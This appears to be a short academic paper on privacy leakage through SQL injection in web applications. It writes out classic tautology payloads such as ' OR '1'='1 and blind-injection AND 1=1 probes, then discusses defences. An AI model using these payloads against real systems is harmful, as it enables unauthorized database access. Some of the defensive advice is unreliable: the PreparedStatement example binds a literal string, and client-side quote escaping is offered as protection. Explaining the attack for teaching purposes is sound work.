When an internet user interacts in web environment by surfing the Net, sending electronic mail messages and participating in online forums lot of data is generated which may have user's private information. If this information is captured by third party tools and techniques; it may cause a breach in end user privacy. In the Web environment, end user privacy is one of the most controversial legal issues. In this paper issues related to information leakage through SQL injection attacks are presented and protection mechanisms are also discussed.
Keywords: - Privacy, Security, Code Injection, SQL Injection, web application security, Malicious Code, Vulnerability.
INTRODUCTION: - As the Internet is growing day by day, most of the people are not aware of security and privacy. Internet is a widespread information infrastructure; it is basically an insecure channel for exchanging information. Web security is the set of rules and measures taken against web security threats. Web privacy is the ability of hiding end user's information. Nowadays most of the applications have the vulnerability (weakness) that makes a threat possible. An attack may be possible due to poor design, configuration mistakes, or poor written code of the web application. A threat can be harmful for database, control of web application, and other components of web application, that are need to be protected from all types of threat. All types of code injection or SQL injection are very dangerous for these components of the web application.
To build secure applications, security and privacy must be considered, and developer must be aware about it. The main goals of information security are Confidentiality, Integrity and availability. Confidentiality means the information available on a system should be safe from unauthorized people; Integrity means the information available in an organization should be complete and whole. It shouldn't be altered by any unauthorized person. Availability is as important as Confidentiality and Integrity. It means the information requested or required by the authorized users should always be available.
CODE INJECTION ATTACKS: - Code Injection is a term used when malicious code/script is injected into a program/web application from an outside source, for example input field which is provided by the web application to take input from the end-user. This attack makes use of lack of accurate input/output data validation. The injected malicious code executes as a part of the application. If successful would result in either damage to an asset, or undesirable operation. Attack can be performed within software, web application etc in which the weakness is present. This term applies to mistakes regardless of whether occur in implementation, design, or other phases of the software development life cycle (SDLC). Weakness contribute to the introduction of vulnerabilities within that software or web applications, vulnerability can be used by the attacker to exploit the web applications to gain access unintended data, denial of services, or perform incorrect operations. HTML Injection Attack, Cross Site Scripting Attack, SQL Injection Attack, Shell Attack, Content Spoofing, HTTP Response Splitting, HTTP Request Splitting and XML Poisoning Attack are some examples of the code injection attack.
SQL Injection: - SQL injection is an attack technique used to exploit application either to gain unauthorized access to a database or to retrieve information directly from the database. [15 integrity]. Attacker can exploit SQL injection vulnerabilities remotely without any database or application authentication. SQL injection attacks are straightforward in nature - an attacker just passes malicious string as an input to an application for stealing confidential information. The complexity of the attack involves exploiting a SQL statement that may be unknown to the attacker. Open-source applications and commercial applications delivered with source code are more vulnerable since an attacker can find potentially vulnerable statements prior to an attack [www.net-security.org/dl/.../IntegrigyIntrotoSQLInjectionAttacks.pdf].
Structured Query Language (SQL) is a specialized programming language for sending queries to databases. Many database products support SQL because it is a standard language. Applications often use user-supplied data to create SQL statements. If an application fails to properly construct SQL statements it is possible for an attacker to alter the statement structure and execute unplanned and potentially hostile commands. When such commands are executed, they do so under the context of the user specified by the application executing the statement. This capability allows attackers to gain control of all database resources accessible by that user, up to and including the ability to execute commands on the hosting system [projects.webappsec.org/w/page/13246963/SQL-Injection].
SQL Injection using Dynamic Strings: -
Most of the web based application takes input from the end user for constructing dynamic SQL statement:
Query = "SELECT * FROM student WHERE sname = "studentname" ";
Example 1 - Dynamically built SQL command string
Consider a web application that takes input from the students and displays the result of the student, with the logic of the above SQL query, the result of the above query is as follows
Suppose an attacker submits a student name that looks like the following:
Student Name: nikita' OR '1'='1
The SQL command string built from this input would be as follows:
SELECT * FROM student WHERE sname = 'nikita' OR '1'='1'
This query will return all rows from the student's database, regardless of whether "nikita" is a real user name. This is due to the OR statement appended to the WHERE clause. The comparison '1'='1' will always return a "true" result, making the overall WHERE clause evaluate to true for all rows in the table. If this is used for authentication purposes, the attacker will often be logged in as the first or last user in the table.
Blind SQL injection: - Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements [http://www.owasp.org/index.php/Blind_SQL_Injection].
One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen.
SELECT sname FROM student WHERE sname = 'fahim' AND 1=1;
This statement will result in a normal page while
SELECT sname FROM student WHERE sname = 'fahim' AND 1=2;
This will likely give a different result if the page is vulnerable to a SQL injection. An injection like this may suggest to the attacker that a blind SQL injection is possible, leaving the attacker to devise statements that evaluate to true or false depending on the contents of another column or table outside of the SELECT statement's column list.
CATEGORIES OF SQL INJECTION ATTACKS
There are four main kinds of SQL Injection attacks
1. SQL Manipulation
2. Code Injection
3. Function Call Injection
4. Buffer Overflows
SQL manipulation usually involves modifying the SQL query through altering the WHERE clause. In this class of attack, amend the WHERE clause of the statement so the WHERE clause constantly results in TRUE [2]www.integrigy.com/.../Integrigy_Oracle_SQL_Injection_Attacks].
In the case of Code injection an attacker introduces new SQL statements into the input field instead of valid input. The classic code or statement appends a SQL Server command to make SQL statement vulnerable. Code injection only works when multiple SQL statements per database request are supported or keywords like AND, OR are supported by the database.
Function call injection is the addition of database functions or user defined functions into a vulnerable SQL queries. These function calls can be used to make internal calls or modify data in the database that can be harmful to the users [2].
SQL injection of buffer overflows is a subset of function call injection. In several commercial and open-source databases, vulnerabilities exist in a few database functions that may result in a buffer overflow.
SQL INJECTION METHODS
There are four types of SQL Injection attacks,
SQL MANIPULATION
The most common type of SQL Injection attack is SQL manipulation. The attacker attempts to modify the present SQL statement by adding elements to the WHERE clause. An example of SQL manipulation can be given by a simple search application. This application takes student roll number as input and displays its result. The web application may run the following query.
SELECT * FROM student WHERE rollnum = '<user_input>'
This query will return the result of the student, but if the attacker attempts to manipulate the SQL statement to execute as -
Figure 1 Inserting Malicious Script into Web PageSELECT * FROM student WHERE rollnum = '' or '1' = '1'
The WHERE clause becomes true for every row and as a result it fetches all entries of the database, in this way the attacker gains access to the application.
Figure 2 Result Generated which lists out all the data in database
METHODS FOR PROTECTION AGAINST SQL INJECTION ATTACKS
SQL Injection attacks can be protected with simple changes in server site programming as well as client side programming. Developers must be aware of all types of attacks and take care for all possible attacks. Each and Every dynamic SQL statement must be sanitized. A single unprotected query can be harmful for the application, data, or database server.
Figure 3 Predefined Choices Instead of Text FieldTAKING USER INPUT FROM PREDEFINED CHOICES
In this way the web application can be secured from malicious attacks. The attacker cannot insert custom queries or any type of harmful script which can disturb the integrity of the database. This is a simple yet effective way to curb web application attacks. This can be established by making simple changes into the server site code.
BIND VARIABLES MECHANISM
Bind variable is another technique to control SQL injection attacks. Using bind variables helps in improving web application performance. The web application developer should use bind variables in all SQL statements. In java language there is a mechanism called prepared statement, this implements the concept of bind variables mechanism.
PreparedStatement pstate;
pstate=con.prepareStatement("select * from student where rollnum = ?");
pstate.setString(1, "sroll");
Parameterized Statements
To defend SQL injection attacks, user input must not be directly passed in SQL queries. Instead, parameterized statements must be preferred, or else user input should be sanitized or filtered carefully.
To sanitize the given user input it must be assigned (bound) to a parameter and passed through a filtering or sanitizing function like one present in PHP (mysql_real_escape_string($user_input)). The use of this function adds a back slash (\) against all of the escape characters such that the malicious script present is not executed. The result of that function can be viewed in figure 4.
Figure 4 Result of Filtering FunctionINPUT VALIDATION
This is the simplest method for defence against SQL injection attacks. Every passed string parameter ought to be validated. Many web applications use hidden fields and other techniques, which also must be validated. If a bind variable is not being used, special database characters must be removed or escaped.
In most databases the single quote character and other special characters are a big issue, the simplest method to avoid them is to escape all single quotes. This can be established by using client side scripting language.
Figure 5 The Use of Client Side Scripting to Avoid Special Characters
Conclusion
Code injection attacks, especially SQL injection attack is one of the infamous issues. Controlling the malicious SQL code/script on the web application and maintaining the end privacy is still a key challenge for the web developer. These issues must be considered seriously by the web developers involved in developing websites using databases. This paper describes how an attacker can exploit the web application by using SQL injection attack to get confidential information from a database. Different protection mechanisms against SQL injection attack are also proposed.
